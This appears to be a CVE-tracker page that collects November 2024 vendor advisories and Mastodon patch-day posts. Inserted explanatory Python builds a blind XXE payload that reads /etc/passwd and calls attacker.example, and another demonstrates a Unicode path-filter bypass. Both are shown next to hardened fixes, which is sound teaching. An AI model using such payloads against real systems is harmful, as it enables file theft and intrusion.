  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-5919(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate arbitrary files from firewalls to an attacker controlled server. This attack requires network access to the firewall management interface.
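To make the "blind XXE that exfiltrates files to an attacker-controlled server" description concrete, here is an added example written for this page; it is not PAN-OS code and says nothing about how PAN-OS parses XML. The payload is constructed in the usual shape of a blind XXE probe (hostnames and the file path are placeholders), and the two parser configurations use only Python's stdlib expat bindings: the permissive one shows the outbound request such a payload provokes (recorded, never fetched), the hardened one refuses any DOCTYPE before an entity can be declared.

```python
"""Blind XXE: the shape of the payload, and a parser configuration that refuses it."""
import xml.parsers.expat as expat

# Constructed payload. The inline DTD declares a parameter entity that reads a
# local file and one that pulls an attacker-hosted DTD; the remote DTD is what
# would combine the two into an outbound request carrying the file contents.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE request [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.example/exfil.dtd">
  %dtd;
]>
<request><id>1</id></request>"""

CLEAN_DOC = b'<?xml version="1.0"?><request><id>1</id></request>'


def external_refs_seen(data: bytes) -> list:
    """Permissive configuration: parameter entities are expanded, so expat asks
    us to resolve each external one it meets. The URI is recorded instead of
    fetched; in a real parser this is the request the attacker's server sees."""
    seen = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_ref(context, base, system_id, public_id):
        seen.append(system_id)
        return 1  # report success without reading anything

    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return seen


class DoctypeRejected(ValueError):
    """Raised when a document carries a DOCTYPE on an endpoint that never needs one."""


def parse_hardened(data: bytes) -> str:
    """Hardened configuration: reject any DOCTYPE up front and never resolve an
    external entity. Returns the root element name of an accepted document."""
    root = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE for <{name}> is not allowed here")

    def on_external_ref(context, base, system_id, public_id):
        return 0  # turns any remaining external reference into a parse error

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return root[0]


def hardened_rejects(data: bytes) -> bool:
    """True if the hardened parser refuses `data` because of its DOCTYPE."""
    try:
        parse_hardened(data)
    except DoctypeRejected:
        return True
    return False


if __name__ == "__main__":
    print("permissive parser would contact:", external_refs_seen(XXE_PAYLOAD))
    print("hardened parser rejects payload:", hardened_rejects(XXE_PAYLOAD))
    print("hardened parser accepts clean doc, root =", parse_hardened(CLEAN_DOC))
```

Refusing the DOCTYPE outright is the simplest defensible policy for an API that only ever exchanges element data; where a DTD is genuinely required, the minimum is what the hardened parser does for entities: no parameter-entity expansion and an external-entity handler that fails closed. Note that the blind variant needs no reflected output, so a parser that "only" expands entities silently is still a file-exfiltration primitive for anyone who can reach the endpoint.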

1 repos

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-8180
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 before 17.3.7, 17.4 before 17.4.4, and 17.5 before 17.5.2. Improper output encoding could lead to XSS if CSP is not enabled.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-9693
(8.6 HIGH)

EPSS: 0.04%

updated 2024-11-14T12:31:02

1 posts

An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-2550(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:01

1 posts

A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to stop the GlobalProtect service on the firewall by sending a specially crafted packet that causes a denial of service (DoS) condition. Repeated attempts to trigger this condition result in the firewall entering maintenance mode.

1 repos

https://github.com/EQSTLab/CVE-2024-25503

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-2551(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-14T12:31:01

1 posts

A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to stop a core system service on the firewall by sending a crafted packet through the data plane that causes a denial of service (DoS) condition. Repeated attempts to trigger this condition result in the firewall entering maintenance mode.

1 repos

screaminggoat@infosec.exchange at 2024-11-13T18:38:44.000Z ##

Happy #PatchTuesday on a Wednesday from Palo Alto Networks:

  1. PAN-SA-2024-0016 Chromium: Monthly Vulnerability Updates
  2. CVE-2024-5920 (CVSSv4: 4.6 medium) PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator
  3. CVE-2024-2550 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  4. CVE-2024-2551 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway Using a Specially Crafted Packet
  5. CVE-2024-2552 (CVSSv4: 6.8 medium) PAN-OS: Arbitrary File Delete Vulnerability in the Command Line Interface (CLI)
  6. CVE-2024-5917 (CVSSv4: 6.3 medium) PAN-OS: Server-Side Request Forgery in WildFire
  7. CVE-2024-5918 (CVSSv4: 5.3 medium) PAN-OS: Improper Certificate Validation Enables Impersonation of a Legitimate GlobalProtect User
  8. CVE-2024-5919 (CVSSv4: 5.1 medium) PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability
  9. CVE-2024-9472 (CVSSv4: 8.7 high) PAN-OS: Firewall Denial of Service (DoS) Using Specially Crafted Traffic

"Palo Alto Networks is not aware of any malicious exploitation of this issue." RE:CVE-2024-9472: "However, customers have reported encountering this issue during normal operations."

#paloaltonetworks #pan #panos #vulnerability #CVE

##

CVE-2024-8535
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-14T00:31:11

1 posts

Authenticated user can access unintended user capabilities in NetScaler ADC and NetScaler Gateway if the appliance must be configured as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) with KCDAccount configuration for Kerberos SSO to access backend resources OR the appliance must be configured as an Auth Server (AAA Vserver) with KCDAccount configuration for Kerberos SSO to access backend resour

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-43093
(7.8 HIGH)

EPSS: 0.25%

updated 2024-11-13T21:31:39

3 posts

In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypass of a file path filter designed to prevent access to sensitive directories due to incorrect unicode normalization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.
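The description names the general pattern: a path filter compares one spelling of a string while the layer that serves the file resolves another. The following is an added example constructed for this page, not the code or the directory list from ExternalStorageProvider.java and not a claim about which normalization Android applies: it assumes a serving layer that folds compatibility characters (NFKC) and collapses `..` segments, and shows a filter that compares the raw string beside one that normalizes exactly as the serving layer does. Full-width Latin letters are used as the mismatch because NFKC maps them onto ASCII.

```python
"""Deny-list path filter that compares before normalization, beside one that normalizes first."""
import posixpath
import unicodedata

# Directories the filter is meant to hide. Constructed for this example; not
# the list used by the real provider.
HIDDEN_PREFIXES = ("Android/data", "Android/obb")


def resolve(path: str) -> str:
    """Stand-in for the storage layer that ultimately serves the file. Assumed
    behaviour for the demonstration: NFKC normalization (full-width letters
    become ASCII) followed by '..' collapsing."""
    normalized = unicodedata.normalize("NFKC", path)
    return posixpath.normpath(normalized).lstrip("/")


def _under_hidden_prefix(clean: str) -> bool:
    return any(clean == p or clean.startswith(p + "/") for p in HIDDEN_PREFIXES)


def is_hidden_vulnerable(path: str) -> bool:
    """Compares the raw string. A full-width spelling of 'Android' matches no
    prefix, yet resolve() maps it onto the hidden directory."""
    clean = posixpath.normpath(path).lstrip("/")
    return _under_hidden_prefix(clean)


def is_hidden_fixed(path: str) -> bool:
    """Normalizes the same way the serving layer does before comparing, so the
    check and the access see the same path."""
    return _under_hidden_prefix(resolve(path))


def access_allowed(path: str, checker) -> tuple:
    """Returns (allowed, resolved_path): whether the filter lets the request
    through, and which directory would actually be served."""
    return (not checker(path), resolve(path))


# Constructed inputs: the same app-private file spelled two ways.
FULLWIDTH = "Ａｎｄｒｏｉｄ/data/com.example.app/files/secret.db"
PLAIN = "Android/data/com.example.app/files/secret.db"

if __name__ == "__main__":
    for name, checker in (("vulnerable", is_hidden_vulnerable), ("fixed", is_hidden_fixed)):
        allowed, served = access_allowed(FULLWIDTH, checker)
        print(f"{name:10s} allowed={allowed} serves={served}")
```

The fix is not "add NFKC to the filter" in itself; it is that the filter and the consumer must canonicalize identically, whatever that canonical form is, and the comparison must run on the canonical form. Any transformation the consumer applies after the check (normalization, case folding, symlink or `..` resolution) is a bypass candidate.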

2 repos

https://github.com/hatvix1/CVE-2024-43093

https://github.com/HatvixSupport/CVE-2024-43093

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:01:23.000Z ##

CVE ID: CVE-2024-43093
Vendor: Android
Product: Framework
Date Added: 2024-11-07
Vulnerability: Android Framework Privilege Escalation Vulnerability
Notes: source.android.com/docs/securi ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2024-8534
(5.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T21:30:33

1 post

Memory safety vulnerability leading to memory corruption and Denial of Service in NetScaler ADC and Gateway if the appliance must be configured as a Gateway (VPN Vserver) with RDP Feature enabled OR the appliance must be configured as a Gateway (VPN Vserver) and RDP Proxy Server Profile is created and set to Gateway (VPN Vserver) OR the appliance must be configured as a Auth Server (AAA Vserver) w

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2024-11116
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:06

1 post

Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11110
(6.5 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:05

2 posts

Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778.69 allowed a remote attacker to bypass site isolation via a crafted Chrome Extension. (Chromium security severity: High)

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11115
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T18:33:05

1 post

Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 131.0.6778.69 allowed a remote attacker to perform privilege escalation via a series of UI gestures. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11111
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:33:05

1 post

Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11117
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T18:31:59

2 posts

Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778.69 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Low)

screaminggoat@infosec.exchange at 2024-11-14T20:13:10.000Z ##

Microsoft Edge security advisory: Release notes for Microsoft Edge Security Updates
This isn't live yet, but the security advisories for related Chromium vulnerabilities are hitting the RSS feed.
CVE-2024-11110 through CVE-2024-11117 (originally announced by Google on Tuesday) are now patched in Microsoft Edge version 131.0.2903.48. There's a new CVE that is Edge-specific: CVE-2024-49025 (5.4 medium) Microsoft Edge (Chromium-based) Information Disclosure Vulnerability. It allows for an email or web-based attack scenario where a user has to open a specially crafted file, and information in the victim's browser associated with the vulnerable URL (e.g. Personally Identifiable Information) can be read by the malicious JavaScript code and sent to the attacker. Not exploited, not publicly disclosed, and exploitation is less likely.

#msrc #chrome #chromium #vulnerability #CVE_2024_49025 #edge #cve #patchtuesday

##

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-8069
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T18:31:59

3 posts

Limited remote code execution with the privileges of a NetworkService account in Citrix Session Recording if the attacker is an authenticated user on the same intranet as the session recording server

screaminggoat@infosec.exchange at 2024-11-13T14:17:04.000Z ##

The second Citrix security advisory Citrix Session Recording Security Bulletin for CVE-2024-8068 and CVE-2024-8069 appears to be the same vulnerabilities mentioned in yesterday's watchTowr blog post Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown), based on the credits/acknowledgement to watchTowr, description of vulnerabilities, and the affected products. At the time of this toot, watchTowr has not updated their blog post to include the CVE IDs.

#Citrix #vulnerability #virtualappsanddesktops #cve #infosec #cybersecurity #watchtowr

##

GossiTheDog@cyberplace.social at 2024-11-12T21:22:55.000Z ##

If you present Citrix StoreFront aka Citrix StoreWeb directly to the internet and have enabled session recording, you will want to drop everything and install patches for CVE-2024-8068 and CVE-2024-8069. People are already scanning for it (no signs of exploitation).

It’s a niche scenario for direct internet access.

Vendor advisory: support.citrix.com/s/article/C

Technical write up: labs.watchtowr.com/visionaries

Shodan dork: beta.shodan.io/search?query=ht

Citrix have used terms like “limited RCE” and “intranet” 🤨

##

screaminggoat@infosec.exchange at 2024-11-12T16:21:27.000Z ##

Happy #PatchTuesday from Citrix:

Please see the advisories for the prerequisites for each vulnerability.

#Citrix #NetScaler #CVE #vulnerability #infosec #cyberesecurity

##

CVE-2014-2120
(5.4 MEDIUM)

EPSS: 0.25%

updated 2024-11-13T18:31:52

2 posts

Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCun19025.

cisakevtracker@mastodon.social at 2024-11-12T19:01:09.000Z ##

CVE ID: CVE-2014-2120
Vendor: Cisco
Product: Adaptive Security Appliance (ASA)
Date Added: 2024-11-12
Vulnerability: Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
Notes: web.archive.org/web/2014040304 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-33505
(5.6 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 post

A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, FortiManager version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14 allows an attacker to escalate privileges via specially crafted HTTP requests

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-50176
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 post

A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.13 allows an attacker to execute unauthorized code or commands via a phishing SAML authentication link.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
